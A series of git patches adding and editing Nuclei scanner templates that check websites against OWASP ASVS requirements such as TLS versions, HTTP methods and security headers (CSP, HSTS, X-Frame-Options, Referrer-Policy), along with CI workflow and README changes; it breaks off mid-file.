+ssl: + - address: "{{Host}}:{{Port}}" + min_version: ssl30 + max_version: ssl30 + + extractors: + - type: json + name : test + json: + - " .tls_version" + + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: json + name : test + json: + - " .tls_version" + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: json + name : test + json: + - " .tls_version" \ No newline at end of file From 06bf232060870086bbc934a24d579df2f218970a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 21:10:37 +0330 Subject: [PATCH 027/129] Update 13.2.1.yaml Fix lint issue. Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 94d569e..5180abd 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -94,7 +94,7 @@ http: negative: true dsl: - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - + - method: TRACE path: - "{{BaseURL}}" From d47b6ffdfd6a2e55d92b3af0c67113f2a0fdcced Mon Sep 17 00:00:00 2001 From: Reza Saeedi Date: Fri, 4 Aug 2023 22:05:39 +0330 Subject: [PATCH 028/129] Update 9-3-1.yaml Signed-off-by: Reza Saeedi --- templates/9-3-1.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/templates/9-3-1.yaml b/templates/9-3-1.yaml index cbba2d7..fd5bf0e 100644 --- a/templates/9-3-1.yaml +++ b/templates/9-3-1.yaml @@ -25,7 +25,6 @@ ssl: extractors: - type: json - name : test json: - " .tls_version" @@ -35,7 +34,6 @@ ssl: extractors: - type: json - name : test json: - " .tls_version" @@ -45,6 +43,5 @@ ssl: extractors: - type: json - name : test json: - - " .tls_version" \ No newline at end of file + - " .tls_version" From 3bc924ebaca1406f14e880815528f4b78ad0ac22 Mon Sep 17 00:00:00 2001 From: Reza Saeedi Date: Fri, 4 Aug 2023 22:07:29 +0330 Subject: [PATCH 029/129] Rename 9-3-1.yaml to 9.1.3.yaml Signed-off-by: Reza Saeedi --- templates/{9-3-1.yaml => 9.1.3.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename templates/{9-3-1.yaml => 9.1.3.yaml} (100%) diff --git a/templates/9-3-1.yaml b/templates/9.1.3.yaml similarity index 100% rename from templates/9-3-1.yaml rename to templates/9.1.3.yaml From 91d0fca07643583a30151aa5aa5bfb82b4859e0b Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 10:55:27 +0330 Subject: [PATCH 030/129] Update 13.2.1.yaml Edit `id` and `reference` Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 5180abd..2657a2f 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -1,4 +1,4 @@ -id: asvs_13_2_1 +id: ASVS-4.0.3-V13.2.1 info: name: ASVS 13.2.1 Check @@ -7,7 +7,7 @@ info: classification: cwe-id: CWE-650 reference: - - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods - https://nmap.org/nsedoc/scripts/http-methods.html tags: asvs,13.2.1 description: | From aa7c5aec08a18c6c412370db7ae3b14a91717fb2 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:05:41 +0330 Subject: [PATCH 031/129] Create 14.4.1.yaml Create ASVS-4.0.3-V14.4.1 template. Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 templates/14.4.1.yaml diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml new file mode 100644 index 0000000..98ca000 --- /dev/null +++ b/templates/14.4.1.yaml @@ -0,0 +1,30 @@ +id: ASVS-4.0.3-V14.4.1 + +info: + name: ASVS 14.4.1 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-173 + reference: + - https://github.com/BlazingWind/OWASP-ASVS-4.0-testing-guide/blob/main/14-Configuration/14-4-1-Charset.md + tags: asvs,14.4.1 + description: | + Verify that every HTTP response contains a Content-Type header. Also specify a safe character set (e.g., UTF-8, ISO-8859-1) if the content types are text/*, /+xml and application/xml. Content must match with the provided Content-Type header. + +http: + - raw: + - | + GET {{Path}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: */* + + extractors: + - type: kval + name: "Content-Type" + part: header + kval: + - Content_Type From ce1c075ebbcf0170c8075da268095031abd00663 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:27:04 +0330 Subject: [PATCH 032/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 0b29477..430cc02 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,3 @@ jobs: run: | cp -r ${{ github.workspace }} $HOME nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w ./workflows -allow-local-file-access From aaac3de74889709de0fdfdc8adfa15c1c8fcd3b4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:36:25 +0330 Subject: [PATCH 033/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 430cc02..e31adb3 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -26,4 +26,4 @@ jobs: - name: Template Validation run: | cp -r ${{ github.workspace }} $HOME - nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -allow-local-file-access -t $HOME/templates From f713df2d772c9748345b67efccce85aa242889c9 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:43:12 +0330 Subject: [PATCH 034/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index e31adb3..ced5499 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,5 +25,4 @@ jobs: - name: Template Validation run: | - cp -r ${{ github.workspace }} $HOME - nuclei -duc -validate -allow-local-file-access -t $HOME/templates + nuclei -duc -validate -allow-local-file-access -t ${{ github.workspace }}/templates From 6eb6d61b19873c293c9d82659590cc8e86a8985a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:50:56 +0330 Subject: [PATCH 035/129] Update 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 2657a2f..5e3f4b0 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -1,4 +1,4 @@ -id: ASVS-4.0.3-V13.2.1 +id: ASVS-4-0-3-V13-2-1 info: name: ASVS 13.2.1 Check From ab09bc83890c57760817423e20b3ad66a3080e38 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:55:04 +0330 Subject: [PATCH 036/129] Update 14.4.1.yaml Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index 98ca000..aff5c31 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml @@ -1,4 +1,4 @@ -id: ASVS-4.0.3-V14.4.1 +id: ASVS-4-0-3-V14-4-1 info: name: ASVS 14.4.1 Check From 74bbfc1443b466648488dfe63a03fc7092bd6b7d Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 12:01:08 +0330 Subject: [PATCH 037/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index ced5499..2656ccd 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,4 +25,5 @@ jobs: - name: Template Validation run: | - nuclei -duc -validate -allow-local-file-access -t ${{ github.workspace }}/templates + cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates + nuclei -duc -validate -allow-local-file-access From 69b158d46661a862ad5a9878f201f326ccdf4a59 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 16:35:24 +0330 Subject: [PATCH 038/129] Update 14.4.1.yaml Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 42 ++++++++++++++++++++++++++++++++++++++---- 1 file changed, 38 insertions(+), 4 deletions(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index aff5c31..8b042bd 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml @@ -7,7 +7,7 @@ info: classification: cwe-id: CWE-173 reference: - - https://github.com/BlazingWind/OWASP-ASVS-4.0-testing-guide/blob/main/14-Configuration/14-4-1-Charset.md + - https://github.com/OWASP/ASVS/issues/710 tags: asvs,14.4.1 description: | Verify that every HTTP response contains a Content-Type header. Also specify a safe character set (e.g., UTF-8, ISO-8859-1) if the content types are text/*, /+xml and application/xml. Content must match with the provided Content-Type header. @@ -15,11 +15,10 @@ info: http: - raw: - | - GET {{Path}} HTTP/1.1 + GET {{BaseURL}} HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: */* extractors: @@ -28,3 +27,38 @@ http: part: header kval: - Content_Type + - type: regex + name: "HTML meta charset" + regex: + - (?i) + part: body + - type: regex + name: "XML declaration encoding" + regex: + - (?i)<\?xml\s+version\s*=\s*["'][0-9.]*["']\s+encoding\s*=\s*["'](utf-?8|utf-?16|iso-?8859-?1)["']\s*\?> + part: body + + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + name: "Content-Type header" + negative: true + regex: + - (?i)Content-Type:\s+text/(\w+);\s+charset=(utf-?8|iso-?8859?-1) + - (?i)Content-Type:\s+(application/xml|\+xml);\s+charset=(utf-?8|utf-?16) + part: header + + - type: regex + name: "HTML meta charset" + negative: true + regex: + - (?i) + part: body + + - type: regex + name: "XML declaration encoding" + negative: true + regex: + - (?i)<\?xml\s+version\s*=\s*["'][0-9.]*["']\s+encoding\s*=\s*["'](utf-?8|utf-?16|iso-?8859-?1)["']\s*\?> + part: body From 58103a18ca9dac19d0ab399988008f9614edea01 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 16:40:32 +0330 Subject: [PATCH 039/129] Update 14.4.1.yaml Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index 8b042bd..999b3e6 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml @@ -11,7 +11,6 @@ info: tags: asvs,14.4.1 description: | Verify that every HTTP response contains a Content-Type header. Also specify a safe character set (e.g., UTF-8, ISO-8859-1) if the content types are text/*, /+xml and application/xml. Content must match with the provided Content-Type header. - http: - raw: - | @@ -26,7 +25,7 @@ http: name: "Content-Type" part: header kval: - - Content_Type + - Content_Type - type: regex name: "HTML meta charset" regex: From b2b8f1ab6edecd6f41e804421cadf57f5341acce Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 16:42:05 +0330 Subject: [PATCH 040/129] Update 14.4.1.yaml Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index 999b3e6..6610704 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml @@ -36,7 +36,7 @@ http: regex: - (?i)<\?xml\s+version\s*=\s*["'][0-9.]*["']\s+encoding\s*=\s*["'](utf-?8|utf-?16|iso-?8859-?1)["']\s*\?> part: body - + matchers-condition: and stop-at-first-match: true matchers: From e139939993cbe0fb88e4acb7cdcce66ce536a49d Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 20 Aug 2023 11:00:35 +0330 Subject: [PATCH 041/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/tab_contributing.md b/tab_contributing.md index 2a82cf5..e5bec91 100644 --- a/tab_contributing.md +++ b/tab_contributing.md @@ -15,7 +15,5 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Mohammad Khodaiemehr](https://github.com/m0khd) - [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) -- [Dorna Azhirak](https://github.com/nameddorna) From 0eb82cf1607492140095806e01276736a06e50ac Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 31 Aug 2023 14:03:08 +0330 Subject: [PATCH 042/129] Create 14.4.2.yaml Signed-off-by: Hamed Salimian --- templates/14.4.2.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 templates/14.4.2.yaml diff --git a/templates/14.4.2.yaml b/templates/14.4.2.yaml new file mode 100644 index 0000000..309fecf --- /dev/null +++ b/templates/14.4.2.yaml @@ -0,0 +1,30 @@ +id: ASVS-4-0-3-V14-4-2 + +info: + name: ASVS 14.4.2 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-116 + reference: + - https://github.com/OWASP/ASVS/issues/1009 + - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition + tags: asvs,14.4.2 + description: | + Verify that all API responses contain a Content-Disposition: attachment; filename="api.json" header (or other appropriate filename for the content type). + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + matchers: + - type: dsl + name: '"Content-Disposition: attachment; filename=" header does not exist.' + dsl: + - '!contains(header, "Content-Disposition: attachment; filename=")' + From 7537facac395a1556ef50c6c1d60d9ebbbc1f868 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 31 Aug 2023 14:07:43 +0330 Subject: [PATCH 043/129] Update 14.4.2.yaml Signed-off-by: Hamed Salimian --- templates/14.4.2.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/templates/14.4.2.yaml b/templates/14.4.2.yaml index 309fecf..161a4a5 100644 --- a/templates/14.4.2.yaml +++ b/templates/14.4.2.yaml @@ -12,7 +12,7 @@ info: tags: asvs,14.4.2 description: | Verify that all API responses contain a Content-Disposition: attachment; filename="api.json" header (or other appropriate filename for the content type). - + http: - raw: - | @@ -27,4 +27,3 @@ http: name: '"Content-Disposition: attachment; filename=" header does not exist.' dsl: - '!contains(header, "Content-Disposition: attachment; filename=")' - From 895171402d27c395e27eccdf336b0417eb927351 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Sep 2023 15:07:45 +0330 Subject: [PATCH 044/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 7037f89..091b4a0 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,5 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) From 26a97a2740f7084d9d15e2186ac1c92ba05f6bed Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Sep 2023 15:08:05 +0330 Subject: [PATCH 045/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 1 - 1 file changed, 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index e5bec91..e1a150d 100644 --- a/tab_contributing.md +++ b/tab_contributing.md @@ -15,5 +15,4 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) From e6108c62ff15bfa720c2bf3c6d6034c4b908feae Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 13 Sep 2023 08:54:38 +0330 Subject: [PATCH 046/129] Create 14.4.3.yaml Signed-off-by: Hamed Salimian --- templates/14.4.3.yaml | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 templates/14.4.3.yaml diff --git a/templates/14.4.3.yaml b/templates/14.4.3.yaml new file mode 100644 index 0000000..7dd5bfc --- /dev/null +++ b/templates/14.4.3.yaml @@ -0,0 +1,38 @@ +id: ASVS-4-0-3-V14-4-3 + +info: + name: ASVS 14.4.3 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-1021 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html + tags: asvs,14.4.3 + description: | + Verify that a Content Security Policy (CSP) response header is in place that helps mitigate impact for XSS attacks like HTML, DOM, JSON, and JavaScript injection vulnerabilities. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + matchers-condition: and + matchers: + - type: word + name: 'Content Security Policy (CSP) header does not exist.' + part: header + negative: true + words: + - 'Content-Security-Policy:' + - 'Content-Security-Policy-Report-Only:' + - type: regex + name: 'Content Security Policy (CSP) Meta Tag does not exist.' + part: body + negative: true + regex: + - (?i) From 4a4558a8cfc29bebea17e7be64f8ad0e3f0d9206 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 13 Sep 2023 09:00:05 +0330 Subject: [PATCH 047/129] Update 14.4.3.yaml Signed-off-by: Hamed Salimian --- templates/14.4.3.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.4.3.yaml b/templates/14.4.3.yaml index 7dd5bfc..3b7c3c7 100644 --- a/templates/14.4.3.yaml +++ b/templates/14.4.3.yaml @@ -35,4 +35,4 @@ http: part: body negative: true regex: - - (?i) + - (?i) From 4e7e7cf946ad14e04a83ada4e3545839bfdd0bb4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 09:54:44 +0330 Subject: [PATCH 048/129] Create 14.4.4.yaml Signed-off-by: Hamed Salimian --- templates/14.4.4.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 templates/14.4.4.yaml diff --git a/templates/14.4.4.yaml b/templates/14.4.4.yaml new file mode 100644 index 0000000..6e4a257 --- /dev/null +++ b/templates/14.4.4.yaml @@ -0,0 +1,28 @@ +id: ASVS-4-0-3-V14-4-4 + +info: + name: ASVS 14.4.4 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-116 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html + tags: asvs,14.4.4 + description: | + Verify that all responses contain a X-Content-Type-Options: nosniff header. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + matchers: + - type: dsl + name: '"X-Content-Type-Options: nosniff" header does not exist.' + dsl: + - '!contains(header, "X-Content-Type-Options: nosniff")' From c61ed7d8f0d229aae3c7cd95baa54f301a65e495 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 12:08:34 +0330 Subject: [PATCH 049/129] Create 14.4.5.yaml Signed-off-by: Hamed Salimian --- templates/14.4.5.yaml | 44 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 templates/14.4.5.yaml diff --git a/templates/14.4.5.yaml b/templates/14.4.5.yaml new file mode 100644 index 0000000..54e39ff --- /dev/null +++ b/templates/14.4.5.yaml @@ -0,0 +1,44 @@ +id: ASVS-4-0-3-V14-4-5 + +info: + name: ASVS 14.4.5 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-523 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html + tags: asvs,14.4.5 + description: | + Verify that a Strict-Transport-Security header is included on all responses and for all subdomains, such as Strict-Transport-Security: max-age=15724800; includeSubdomains. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + extractors: + - type: kval + name: "Strict-Transport-Security" + part: header + kval: + - Strict_Transport_Security + + stop-at-first-match: true + matchers: + - type: word + name: 'Strict-Transport-Security (HSTS) header does not exist.' + part: header + negative: true + words: + - 'Strict-Transport-Security:' + - type: regex + name: "Strict-Transport-Security (HSTS) header does not include subdomains." + negative: true + regex: + - (?i)Strict-Transport-Security:\s*.*\bincludeSubdomains\b + part: header From aec60c85b28c21077dd4c3f8c898a7e50b1abab4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 15:14:13 +0330 Subject: [PATCH 050/129] Update 14.4.5.yaml Signed-off-by: Hamed Salimian --- templates/14.4.5.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/14.4.5.yaml b/templates/14.4.5.yaml index 54e39ff..796e42f 100644 --- a/templates/14.4.5.yaml +++ b/templates/14.4.5.yaml @@ -31,13 +31,13 @@ http: stop-at-first-match: true matchers: - type: word - name: 'Strict-Transport-Security (HSTS) header does not exist.' + name: "'Strict-Transport-Security' (HSTS) header does not exist." part: header negative: true words: - 'Strict-Transport-Security:' - type: regex - name: "Strict-Transport-Security (HSTS) header does not include subdomains." + name: "'Strict-Transport-Security' (HSTS) header does not include subdomains." negative: true regex: - (?i)Strict-Transport-Security:\s*.*\bincludeSubdomains\b From 036dbe64b018a39d9db2f83d272a0d8202b6e82f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 15:15:41 +0330 Subject: [PATCH 051/129] Create 14.4.6.yaml Signed-off-by: Hamed Salimian --- templates/14.4.6.yaml | 44 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 templates/14.4.6.yaml diff --git a/templates/14.4.6.yaml b/templates/14.4.6.yaml new file mode 100644 index 0000000..1879bb8 --- /dev/null +++ b/templates/14.4.6.yaml @@ -0,0 +1,44 @@ +id: ASVS-4-0-3-V14-4-6 + +info: + name: ASVS 14.4.6 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-116 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#referrer-policy + tags: asvs,14.4.6 + description: | + Verify that a suitable Referrer-Policy header is included to avoid exposing sensitive information in the URL through the Referer header to untrusted parties. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + extractors: + - type: kval + name: "Referrer-Policy" + part: header + kval: + - Referrer_Policy + + matchers-condition: and + matchers: + - type: regex + name: "'Referrer-Policy' header does not exist or does not contain 'strict-origin-when-cross-origin'" + negative: true + regex: + - (?i)Referrer-Policy:\s*.*\bstrict-origin-when-cross-origin\b + part: header + - type: regex + name: "referrer policy inside HTML meta tag does not exist or does not contain 'strict-origin-when-cross-origin'." + negative: true + regex: + - (?i) + part: body From 59240357af8adbb45fa92ae50b857b22375c2072 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 18:32:10 +0330 Subject: [PATCH 052/129] Create 14.4.7.yaml Signed-off-by: Hamed Salimian --- templates/14.4.7.yaml | 56 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 templates/14.4.7.yaml diff --git a/templates/14.4.7.yaml b/templates/14.4.7.yaml new file mode 100644 index 0000000..63fe662 --- /dev/null +++ b/templates/14.4.7.yaml @@ -0,0 +1,56 @@ +id: ASVS-4-0-3-V14-4-7 + +info: + name: ASVS 14.4.7 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-1021 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-frame-options + - https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-security-policy + tags: asvs,14.4.7 + description: | + Verify that the content of a web application cannot be embedded in a third-party site by default and that embedding of the exact resources is only allowed where necessary by using suitable Content-Security-Policy: frame-ancestors and X-Frame-Options response headers. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + extractors: + - type: kval + name: "X-Frame-Options header" + part: header + kval: + - X_Frame_Options + - type: kval + name: "Content-Security-Policy header" + part: header + kval: + - Content_Security_Policy + - type: regex + name: 'Content Security Policy (CSP) Meta Tag' + part: body + regex: + - (?i) + + matchers-condition: and + matchers: + - type: regex + name: "'X-Frame-Options' header with 'DENY' or 'SAMEORIGIN' and 'Content-Security-Policy' (CSP) header with 'frame-ancestors' directive do not exist." + negative: true + regex: + - (?i)X-Frame-Options:\s*.*\b(DENY|SAMEORIGIN)\b + - (?i)Content-Security-Policy:[^;]*frame-ancestors + part: header + - type: regex + name: "Content Security Policy (CSP) inside HTML meta tag with 'frame-ancestors' directive does not exist." + negative: true + regex: + - (?i)]*content=["'][^"']*frame-ancestors[^"']*["'][^>]*> + part: body From 0d5ccba492fda324c6ae64e680440036949b981e Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 29 Sep 2023 12:28:36 +0330 Subject: [PATCH 053/129] Update 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 5e3f4b0..9a99776 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -3,7 +3,7 @@ id: ASVS-4-0-3-V13-2-1 info: name: ASVS 13.2.1 Check author: Hamed Salimian - severity: high + severity: medium classification: cwe-id: CWE-650 reference: From 9e28ca84dae6a2ecab3f61a63893d2d8f4dacc1a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 1 Oct 2023 04:58:11 +0000 Subject: [PATCH 054/129] Update Submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 982975c..507f941 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 982975c8775116be62cd507660d125e888f17b4a +Subproject commit 507f941014b049f142efe02c3bda411c34b376e2 From 0cb2b6b1179f21b4b09b938f8f6cb3b834322a5c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 6 Oct 2023 15:28:21 +0330 Subject: [PATCH 055/129] Create 14.5.2.yaml Signed-off-by: Hamed Salimian --- templates/14.5.2.yaml | 48 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 templates/14.5.2.yaml diff --git a/templates/14.5.2.yaml b/templates/14.5.2.yaml new file mode 100644 index 0000000..16eb225 --- /dev/null +++ b/templates/14.5.2.yaml @@ -0,0 +1,48 @@ +id: ASVS-4-0-3-V14-5-2 + +info: + name: ASVS 14.5.2 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-346 + reference: + - https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_2/ + tags: asvs,14.5.2 + description: | + Verify that the supplied Origin header is not used for authentication or access control decisions, as the Origin header can easily be changed by an attacker. + +variables: + forbidden_status_code: 